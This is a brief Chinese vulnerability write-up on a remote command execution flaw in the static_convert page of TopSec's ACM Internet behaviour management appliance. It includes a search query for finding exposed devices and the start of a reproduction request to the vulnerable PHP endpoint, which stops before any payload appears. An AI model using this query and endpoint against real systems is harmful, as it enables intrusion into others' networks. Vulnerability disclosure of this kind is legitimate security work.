天融信TOPSEC static_convert 远程命令执行漏洞

产品介绍

天融信上网行为管理系统（ACM）是天融信基于多年安全产品研发经验，满足各行各业上网行为管理和内容审计需求而研发的专业设备。它不仅能够防止非法信息传播、敏感信息泄漏，实现实时监控、日志追溯和网络资源管理，还提供强大的用户管理、报表统计分析功能。

漏洞描述

TOPSEC上网行为管理 Static_Convert存在严重的远程命令执行漏洞。攻击者通过发送精心构造的恶意请求，利用了该漏洞，成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作，可能导致数据泄露、系统瘫痪或远程控制。

资产测绘

app=“天融信-上网行为管理系统”

漏洞复现

GET /view/IPV6/naborTable/static_convert.php?blocks[0]